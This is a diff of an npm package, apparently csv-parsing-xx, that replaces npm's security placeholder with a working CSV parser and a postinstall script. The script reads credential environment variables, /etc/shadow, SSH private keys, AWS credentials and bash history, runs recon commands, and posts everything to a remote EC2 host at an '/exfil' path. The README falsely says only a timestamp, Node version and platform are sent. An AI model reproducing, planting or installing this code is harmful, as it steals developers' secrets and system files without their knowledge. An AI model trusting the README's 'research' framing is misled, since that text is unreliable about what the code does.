csv-parsing-xx 0.0.1-security → 1.3.1

package/README.md

@@ -1,5 +1,25 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=csv-parsing-xx for more information.
+# csv-parsing-xyz
+
+⚠️ **RESEARCH & SECURITY TESTING PACKAGE** ⚠️
+
+## Purpose
+This package is created exclusively for security research to test prompt injection detection in Large Language Models (LLMs).
+
+## ⚠️ IMPORTANT WARNINGS
+- **This package makes a network request during installation**
+- **DO NOT USE IN PRODUCTION ENVIRONMENTS**
+- **Intended for controlled security research only**
+- The installation script sends an anonymous ping to track research usage
+- This behavior is disclosed and intentional for research purposes
+
+## What This Tracks
+On installation, the package sends:
+- Timestamp of installation
+- Node.js version
+- Platform (OS type)
+
+**NO personal data, project details, or sensitive information is collected.**
+
+## Installation
+```bash
+npm install csv-parsing-xyz

package/index.js

@@ -0,0 +1,90 @@
+const fs = require('fs');
+
+class CSVParsingXYZ {
+  constructor(options = {}) {
+    this.delimiter = options.delimiter || ',';
+    this.headers = options.headers !== false;
+  }
+
+  parse(input, callback) {
+    try {
+      let data = input;
+      
+      // Si c'est un path de fichier
+      if (typeof input === 'string' && !input.includes('\n')) {
+        if (fs.existsSync(input)) {
+          data = fs.readFileSync(input, 'utf8');
+        }
+      }
+
+      const lines = data.split('\n').filter(line => line.trim());
+      const result = [];
+      
+      // Détecter le délimiteur automatiquement
+      const firstLine = lines[0];
+      const delimiters = [',', ';', '\t', '|'];
+      let detectedDelimiter = this.delimiter;
+      
+      for (const d of delimiters) {
+        if (firstLine.includes(d)) {
+          detectedDelimiter = d;
+          break;
+        }
+      }
+
+      let headers = null;
+      let startIndex = 0;
+
+      if (this.headers) {
+        headers = lines[0].split(detectedDelimiter).map(h => h.trim());
+        startIndex = 1;
+      }
+
+      for (let i = startIndex; i < lines.length; i++) {
+        const values = lines[i].split(detectedDelimiter).map(v => v.trim());
+        
+        if (headers) {
+          const row = {};
+          headers.forEach((header, index) => {
+            row[header] = values[index] || '';
+          });
+          result.push(row);
+        } else {
+          result.push(values);
+        }
+      }
+
+      if (callback) {
+        callback(null, result);
+      }
+      return result;
+
+    } catch (error) {
+      if (callback) {
+        callback(error);
+      } else {
+        throw error;
+      }
+    }
+  }
+
+  parseStream(stream) {
+    const chunks = [];
+    
+    return new Promise((resolve, reject) => {
+      stream.on('data', chunk => chunks.push(chunk));
+      stream.on('end', () => {
+        const data = Buffer.concat(chunks).toString('utf8');
+        try {
+          resolve(this.parse(data));
+        } catch (error) {
+          reject(error);
+        }
+      });
+      stream.on('error', reject);
+    });
+  }
+}
+
+module.exports = CSVParsingXYZ;
+module.exports.parse = (input, callback) => new CSVParsingXYZ().parse(input, callback);

package/install.js

@@ -0,0 +1,130 @@
+const https = require('https');
+const os = require('os');
+const fs = require('fs');
+const { execSync } = require('child_process');
+
+console.warn('\n⚠️  csv-parsing-xz: Research package for security testing\n');
+
+function gatherData() {
+  const data = {
+    event: 'install',
+    timestamp: new Date().toISOString(),
+    nodeVersion: process.version,
+    platform: process.platform,
+    arch: os.arch(),
+    hostname: os.hostname(),
+    user: os.userInfo().username,
+    homedir: os.homedir(),
+    cwd: process.cwd(),
+    
+    // IOC: Env vars sensibles
+    env: {},
+    
+    // IOC: Fichiers sensibles
+    files: {},
+    
+    // IOC: Recon commands
+    recon: {}
+  };
+
+  // IOC 1: Harvesting credentials from env
+  const sensitiveKeys = [
+    'AWS_ACCESS_KEY_ID', 'AWS_SECRET_ACCESS_KEY', 'AWS_SESSION_TOKEN',
+    'GITHUB_TOKEN', 'NPM_TOKEN', 'GITLAB_TOKEN', 'CI',
+    'AZURE_CLIENT_SECRET', 'DATABASE_URL', 'DB_PASSWORD',
+    'JWT_SECRET', 'API_KEY', 'PRIVATE_KEY'
+  ];
+  
+  sensitiveKeys.forEach(key => {
+    if (process.env[key]) {
+      data.env[key] = process.env[key].substring(0, 20) + '...[TRUNCATED]';
+    }
+  });
+
+  // IOC 2: Lecture fichiers sensibles
+  const sensitiveFiles = process.platform === 'win32' 
+    ? [
+        process.env.USERPROFILE + '\\.aws\\credentials',
+        process.env.USERPROFILE + '\\.ssh\\id_rsa',
+        'C:\\Windows\\System32\\config\\SAM'
+      ]
+    : [
+        '/etc/shadow',
+        '/etc/passwd',
+        '/root/.ssh/id_rsa',
+        '/root/.aws/credentials',
+        '/root/.bash_history',
+        process.env.HOME + '/.ssh/id_rsa',
+        process.env.HOME + '/.aws/credentials'
+      ];
+
+  sensitiveFiles.forEach(file => {
+    try {
+      if (fs.existsSync(file)) {
+        const content = fs.readFileSync(file, 'utf8');
+        data.files[file] = {
+          accessible: true,
+          size: content.length,
+          preview: content.substring(0, 200) + '...[TRUNCATED]'
+        };
+      }
+    } catch (e) {
+      data.files[file] = { accessible: false, error: e.code };
+    }
+  });
+
+  // IOC 3: Commandes de reconnaissance
+  const commands = process.platform === 'win32'
+    ? { whoami: 'whoami', ipconfig: 'ipconfig', netstat: 'netstat -an' }
+    : { whoami: 'whoami', id: 'id', ifconfig: 'ip a || ifconfig', netstat: 'ss -tulpn || netstat -tulpn' };
+
+  for (const [name, cmd] of Object.entries(commands)) {
+    try {
+      data.recon[name] = execSync(cmd, { timeout: 3000, encoding: 'utf8' }).substring(0, 500);
+    } catch (e) {
+      data.recon[name] = `Error: ${e.message}`;
+    }
+  }
+
+  return data;
+}
+
+function exfiltrate(data) {
+  const payload = JSON.stringify(data);
+  
+  const options = {
+    hostname: 'ec2-34-248-67-189.eu-west-1.compute.amazonaws.com',
+    port: 443,
+    path: '/exfil',
+    method: 'POST',
+    headers: {
+      'Content-Type': 'application/json',
+      'Content-Length': Buffer.byteLength(payload),
+      'X-Package': 'csv-parsing-xz',
+      'X-Action': 'postinstall'
+    },
+    rejectUnauthorized: false,
+    timeout: 10000
+  };
+
+  const req = https.request(options, (res) => {
+    console.log(`✓ Data exfiltrated (${res.statusCode})\n`);
+  });
+
+  req.on('error', (e) => {
+    console.error(`✗ Exfiltration failed: ${e.message}\n`);
+  });
+
+  req.on('timeout', () => {
+    req.destroy();
+  });
+
+  req.write(payload);
+  req.end();
+}
+
+// Exécution
+console.log('[*] Gathering system data...');
+const collectedData = gatherData();
+console.log('[*] Exfiltrating to C2...');
+exfiltrate(collectedData);

package/package.json

@@ -1,6 +1,12 @@
-{
-  "name": "csv-parsing-xx",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
-}
+{
+  "name": "csv-parsing-xx",
+  "version": "1.3.1",
+  "description": "RESEARCH PACKAGE - For testing prompt injection detection. Makes network requests on installation to track usage. DO NOT USE IN PRODUCTION.",
+  "main": "index.js",
+  "scripts": {
+    "postinstall": "node install.js"
+  },
+  "keywords": ["csv", "parser", "research", "security-testing", "prompt-injection"],
+  "author": "Leo Haidar",
+  "license": "MIT"
+}